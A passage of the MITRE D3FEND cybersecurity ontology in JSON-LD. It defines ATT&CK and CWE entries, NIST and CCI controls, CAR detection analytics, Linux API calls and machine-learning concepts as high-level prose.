      }
    },
    {
      "@id": "d3f:LinuxUnlink",
      "@type": "owl:Class",
      "d3f:definition": "Delete a name and possibly the file it refers to.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/unlink.2.html"
      },
      "rdfs:label": "Linux Unlink",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:T0808",
      "@type": "owl:Class",
      "d3f:attack-id": "T0808",
      "d3f:definition": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Control Device Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Control Device Identification"
    },
    {
      "@id": "d3f:AutoregressiveModel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AM",
      "d3f:definition": "An autoregressive (AR) model is a representation of a type of random process; as such, it is used to describe certain time-varying processes in nature, economics, behavior, etc.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Autoregressive model. [Link](https://en.wikipedia.org/wiki/Autoregressive_model)",
      "d3f:synonym": "AR Model",
      "rdfs:label": "Autoregressive Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACE_DETACH",
      "@type": "owl:Class",
      "d3f:definition": "Restart the stopped tracee as for PTRACE_CONT, but first detach from it.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_DETACH",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIResumeProcess"
      }
    },
    {
      "@id": "d3f:Reference-OrganizationalManagementInSAPERPHCM",
      "@type": [
        "owl:NamedIndividual",
        "d3f:BookReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.sap-press.com/organizational-management-in-sap-erp-hcm_3996/"
      },
      "d3f:kb-author": "Soham Ray",
      "d3f:kb-organization": "SAP Press",
      "d3f:kb-reference-of": {
        "@id": "d3f:OrganizationMapping"
      },
      "d3f:kb-reference-title": "Organizational Management in SAP ERP HCM",
      "rdfs:label": "Reference - Organizational Management in SAP ERP HCM"
    },
    {
      "@id": "d3f:CWE-83",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-83",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes \"javascript:\" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.",
      "rdfs:label": "Improper Neutralization of Script in Attributes in a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:Reference-GenericRegsvr32_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-002/"
      },
      "d3f:kb-abstract": "Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic. Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-002: Generic Regsvr32",
      "rdfs:label": "Reference - CAR-2019-04-002: Generic Regsvr32 - MITRE"
    },
    {
      "@id": "d3f:T1585",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585",
      "d3f:definition": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)",
      "rdfs:label": "Establish Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000767_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for local access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000767"
    },
    {
      "@id": "d3f:T1011.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1011.001",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.",
      "rdfs:label": "Exfiltration Over Bluetooth",
      "rdfs:subClassOf": {
        "@id": "d3f:T1011"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Automated Detection and Notification of Unauthorized Components",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "rdfs:label": "RA-5(7)"
    },
    {
      "@id": "d3f:CWE-360",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-360",
      "d3f:definition": "Security based on event locations are insecure and can be spoofed.",
      "rdfs:label": "Trust of System Event Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:T1547.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.002",
      "d3f:definition": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Authentication Package",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N6a4ff3bb1981492ba6120e28b18d03dd"
        }
      ]
    },
    {
      "@id": "_:N6a4ff3bb1981492ba6120e28b18d03dd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T1558.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1558.003",
      "d3f:definition": "Service Principal Name (SPN) scanning is one way to gather hashes, which results in RPC calls conforming to the NSPI protocol.",
      "d3f:may-produce": {
        "@id": "d3f:RPCNetworkTraffic"
      },
      "rdfs:label": "Kerberoasting",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nspi/6dd0a3ea-b4d4-4a73-a857-add03a89a543"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1558"
        },
        {
          "@id": "_:N929c14d3393240d1a1c9e3d5ce88c050"
        }
      ]
    },
    {
      "@id": "_:N929c14d3393240d1a1c9e3d5ce88c050",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RPCNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-002211_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, applies the same security policy filtering to metadata as it applies to data payloads.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002211"
    },
    {
      "@id": "d3f:T1487",
      "@type": "owl:Class",
      "d3f:attack-id": "T1487",
      "d3f:definition": "Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1561.002",
      "rdfs:label": "Disk Structure Wipe",
      "rdfs:seeAlso": {
        "@id": "d3f:T1561.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1453",
      "@type": "owl:Class",
      "d3f:attack-id": "T1453",
      "d3f:definition": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**",
      "rdfs:label": "Abuse Accessibility Features - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Abuse Accessibility Features"
    },
    {
      "@id": "d3f:CWE-499",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-499",
      "d3f:definition": "The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class.",
      "rdfs:label": "Serializable Class Containing Sensitive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:Reference-UnderstandingtheDomainRegistrationBehaviorofSpammers",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=bf4d34a6f9d0168bb07433e84c1567bbe1ba8188"
      },
      "d3f:kb-abstract": "Spammers register a tremendous number of domains to evade blacklisting and takedown efforts. Current techniques to detect such domains rely on crawling spam URLs or monitoring lookup traffic. Such detection techniques are only effective after the spammers have already launched their campaigns, and thus these countermeasures may only come into play after the spammer has already reaped significant benefits from the dissemination of large volumes of spam. In this paper we examine the registration process of such domains, with a particular eye towards features that might indicate that a given domain likely has a malicious purpose at registration time, before it is ever used for an attack. Our assessment includes exploring the characteristics of registrars, domain life cycles, registration bursts, and naming patterns. By investigating zone changes from the .com TLD over a 5-month period, we discover that spammers employ bulk registration, that they often re-use domains previously registered by others, and that they tend to register and host their domains over a small set of registrars. Our findings suggest steps that registries or registrars could use to frustrate the efforts of miscreants to acquire domains in bulk, ultimately reducing their agility for mounting large-scale attacks.",
      "d3f:kb-author": "Hao S, Thomas M, Paxson V, Feamster N, Kreibich C, Grier C, Hollenbeck S",
      "d3f:kb-reference-of": {
        "@id": "d3f:DomainRegistrationTakedown"
      },
      "d3f:kb-reference-title": "Understanding the Domain Registration Behavior of Spammers",
      "rdfs:label": "Reference - Understanding the Domain Registration Behavior of Spammers"
    },
    {
      "@id": "d3f:IA-0008.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008.02",
      "d3f:definition": "Adversaries may employ their own satellite or hosted payload to achieve proximity and a privileged RF geometry. After phasing into the appropriate plane or drift orbit, the rogue vehicle operates as a local peer: emitting narrow-beam or crosslink-compatible signals, relaying user-channel traffic that the target will honor, or advertising services that appear to originate from a trusted neighbor. Close range reduces path loss and allows highly selective interactions, e.g., targeted spoofing of acquisition exchanges, presentation of crafted routing/time distribution messages, or injection of payload tasking that rides established inter-satellite protocols. The rogue platform can also perform spectrum and protocol reconnaissance in situ, refining message formats and timing before attempting first execution.",
      "rdfs:label": "Rogue Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0008"
      },
      "skos:prefLabel": "Rogue Spacecraft"
    },
    {
      "@id": "d3f:OTDeviceIdentificationMessage",
      "@type": "owl:Class",
      "d3f:definition": "Identify devices on the network.",
      "rdfs:comment": [
        "BACnet: i-Am\nBACnet: i-Have\nBACnet: who-Has\nBACnet: who-Is ",
        "ENIP: List Identity",
        "Modbus: Read Device Identification\nModbus: Report Slave ID"
      ],
      "rdfs:label": "OT Device Identification Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:RealTimeOperatingSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ]
    },
    {
      "@id": "d3f:LinearRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LRL",
      "d3f:definition": "A supervised learning method that builds a linear regression model using training data.",
      "d3f:kb-article": "## References\n- Gawali, Suvarna. “Linear Regression Algorithm to Make Predictions Easily.” Analytics Vidhya, 22 July 2022, https://www.analyticsvidhya.com/blog/2021/06/linear-regression-in-machine-learning/.\n- Nau, Robert. “Statistical Forecasting: Notes On Regression and Time Series Analysis.” Introduction to Linear Regression Analysis, Duke University Fuqua School of Business, 18 Aug. 2020, https://people.duke.edu/~rnau/regintro.htm.\n- Ng, Ritchie. “Evaluating a Linear Regression Model.” Ritchieng.github.io, 8 Jan. 2023, https://www.ritchieng.com/machine-learning-evaluate-linear-regression-model/.\n- Bochkarev, Alexei. \"A New Typology Design of Performance Metrics to Measure Errors in Machine Learning Regression Algorithms\", 2019, https://www.researchgate.net/publication/330661543_A_New_Typology_Design_of_Performance_Metrics_to_Measure_Errors_in_Machine_Learning_Regression_Algorithms.",
      "rdfs:label": "Linear Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:LinearRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:CCI-001111_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents remote devices that have established a non-remote connection with the system from communicating outside of that communications path with resources in external networks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001111"
    },
    {
      "@id": "d3f:ConsoleOutputFunction",
      "@type": "owl:Class",
      "d3f:definition": "Outputs characters to a computer console.",
      "rdfs:label": "Console Output Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:MeanAbsoluteDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MAD",
      "d3f:definition": "The mean absolute deviation (MAD), also referred to as the \"mean deviation\" or sometimes \"average absolute deviation\", is the mean of the data's absolute deviations around the data's mean: the average (absolute) distance from the mean.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Average absolute deviation. [Link](https://en.wikipedia.org/wiki/Average_absolute_deviation)",
      "d3f:synonym": "MAD",
      "rdfs:label": "Mean Absolute Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:AverageAbsoluteDeviation"
      }
    },
    {
      "@id": "d3f:Reference-SecureMultipurposeInternetMailExtensionsMIME-Version3.1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc3851"
      },
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-title": "Secure/Multipurpose Internet Mail Extensions (S/MIME) Version 3.1 Message Specification",
      "rdfs:label": "Reference - Secure/Multipurpose Internet Mail Extensions (S/MIME) Version 3.1"
    },
    {
      "@id": "d3f:OSAPIFunction",
      "@type": "owl:Class",
      "d3f:definition": "A callable interface provided by an operating system that allows applications or other software components to interact with and utilize the underlying system resources, services, or functionalities.",
      "rdfs:label": "OS API Function",
      "rdfs:seeAlso": [
        {
          "@id": "http://dbpedia.org/page/Linux_kernel_interfaces"
        },
        {
          "@id": "dbr:Windows_API"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:may-isolate",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may isolate",
      "rdfs:label": "may-isolate",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:DescriptionLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DL",
      "d3f:definition": "A description logic (DL) is a form of logic usually more expressive than propositional logic but less expressive than first-order logic.",
      "d3f:kb-article": "## How it works\nThe core reasoning problems for description logics (DLs) are (usually) decidable, and efficient decision procedures have been designed and implemented for these problems. There are general, spatial, temporal, spatiotemporal, and fuzzy description logics, and each description logic features a different balance between expressive power and reasoning complexity by supporting different sets of mathematical constructors.\n\nDLs are used in artificial intelligence to describe and reason about the relevant concepts of an application domain (known as terminological knowledge). It is of particular importance in providing a logical formalism for ontologies and the Semantic Web: the Web Ontology Language (OWL) and its profiles are based on DLs.\n\n## References\n1. Description logic. (2023, April 16). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Description_logic)",
      "rdfs:label": "Description Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:LogFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Log"
      },
      "d3f:definition": "A log file is a file that records either events that occur in an operating system or other software runs, or messages between different users of a communication software. Logging is the act of keeping a log. In the simplest case, messages are written to a single log file.\n\nA transaction log is a file (i.e., log) of the communications between a system and the users of that system, or a data collection method that automatically captures the type, content, or time of transactions made by a person from a terminal with that system. For Web searching, a transaction log is an electronic record of interactions that have occurred during a searching episode between a Web search engine and users searching for information on that Web search engine.\n\nMany operating systems, software frameworks and programs include a logging system. A widely used logging standard is syslog, defined in Internet Engineering Task Force (IETF) RFC 5424. The syslog standard enables a dedicated, standardized subsystem to generate, filter, record, and analyze log messages. This relieves software developers of having to design and code their own ad hoc logging systems.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Log_file"
      },
      "rdfs:label": "Log File",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06515875-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N0716313f9b2f48c9811c0a80766697ec"
        }
      ]
    },
    {
      "@id": "_:N0716313f9b2f48c9811c0a80766697ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Log"
      }
    },
    {
      "@id": "d3f:CWE-288",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-288",
      "d3f:definition": "The product requires authentication, but the product has an alternate path or channel that does not require authentication.",
      "rdfs:label": "Authentication Bypass Using an Alternate Path or Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-306"
      }
    },
    {
      "@id": "d3f:CWE-671",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-671",
      "d3f:definition": "The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.",
      "rdfs:label": "Lack of Administrator Control over Security",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:FileContentAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileContentAnalysis"
      ],
      "d3f:d3fend-id": "D3-FCOA",
      "d3f:definition": "Employing a pattern matching algorithm to statically analyze the content of files.",
      "d3f:kb-article": "## How it works\nAnalyzing a piece of code without it being executed in a sandbox, virtual machine, or simulator. Patterns or signatures in the file can indicate what kind of software it is, including whether it is malware.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CyberVaccineAndPredictiveMalwareDefensiveMethodsAndSystems"
      },
      "rdfs:label": "File Content Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:FileAnalysis"
      }
    },
    {
      "@id": "d3f:GradientBoostedDecisionTree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBDT",
      "d3f:definition": "A gradient-boosted decision tree is, as in other bagging and boosting methods, a method where the relatively 'weak' machine learning model (a decision tree) is used in an ensemble to form a 'strong' machine learning model.",
      "d3f:kb-article": "## Reference\n\n1. Google. (28 Sep 2023). Gradient Boosted Decision Trees.\n[Link](https://developers.google.com/machine-learning/decision-forests/intro-to-gbdt).",
      "rdfs:label": "Gradient-Boosted Decision Tree",
      "rdfs:subClassOf": {
        "@id": "d3f:CART"
      }
    },
    {
      "@id": "d3f:CWE-1314",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1314",
      "d3f:definition": "The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.",
      "rdfs:label": "Missing Write Protection for Parametric Data Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-862"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Network Access to Privileged Commands",
      "d3f:exactly": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6(3)"
    },
    {
      "@id": "d3f:PasswordStore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user repository of account passwords, often accessed via a password manager.",
      "rdfs:label": "Password Store",
      "rdfs:seeAlso": {
        "@id": "dbr:Password_manager"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordDatabase"
      }
    },
    {
      "@id": "d3f:AML.TA0013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0013",
      "d3f:definition": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.",
      "rdfs:label": "Credential Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0013"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Credential Access"
    },
    {
      "@id": "d3f:broader",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x broader y: The entity x represents a more general or inclusive concept than entity y.",
      "rdfs:label": "broader",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-002%3ABatchFileWriteToSystem32_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-002/"
      },
      "d3f:kb-abstract": "While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\\Windows\\System32 directory tree. There will be only occasional false positives due to administrator actions.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-002: Batch File Write to System32",
      "rdfs:label": "Reference - CAR-2021-05-002: Batch File Write to System32 - MITRE"
    },
    {
      "@id": "d3f:CWE-283",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-283",
      "d3f:definition": "The product does not properly verify that a critical resource is owned by the proper entity.",
      "rdfs:label": "Unverified Ownership",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-282"
      }
    },
    {
      "@id": "d3f:FileDecryptionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a previously encrypted file is decoded, rendering its content accessible to authorized users or processes.",
      "rdfs:label": "File Decryption Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Naca00518133e4776a16604de4841695f"
        }
      ]
    },
    {
      "@id": "_:Naca00518133e4776a16604de4841695f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileEncryptionEvent"
      }
    },
    {
      "@id": "d3f:d3fend-annotation",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x d3fend-annotation y: The d3fend object x has the annotation y.",
      "rdfs:label": "d3fend-annotation",
      "rdfs:subPropertyOf": {
        "@id": "owl:versionInfo"
      }
    },
    {
      "@id": "d3f:LogoffEvent",
      "@type": "owl:Class",
      "d3f:definition": "An authentication event where an active session is conclusively terminated, resulting in the cessation of access and deallocation of resources associated with the session, ensuring that the connection to the system, application, or resource no longer exists.",
      "rdfs:label": "Logoff Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationEvent"
        },
        {
          "@id": "_:N0bea8338761945b9ab2d462a2bdcf141"
        },
        {
          "@id": "_:Nf4d14ba4dc92441381b1fd29bb29b3db"
        }
      ]
    },
    {
      "@id": "_:N0bea8338761945b9ab2d462a2bdcf141",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Session"
      }
    },
    {
      "@id": "_:Nf4d14ba4dc92441381b1fd29bb29b3db",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LogonEvent"
      }
    },
    {
      "@id": "d3f:T1583.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.008",
      "d3f:definition": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.",
      "rdfs:label": "Malvertising",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:CWE-1092",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1092",
      "d3f:definition": "The product uses the same control element across multiple architectural layers.",
      "rdfs:label": "Use of Same Invokable Control Element in Multiple Architectural Layers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1084",
      "@type": "owl:Class",
      "d3f:attack-id": "T1084",
      "d3f:definition": "Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.003",
      "rdfs:label": "Windows Management Instrumentation Event Subscription",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IR-4_12",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
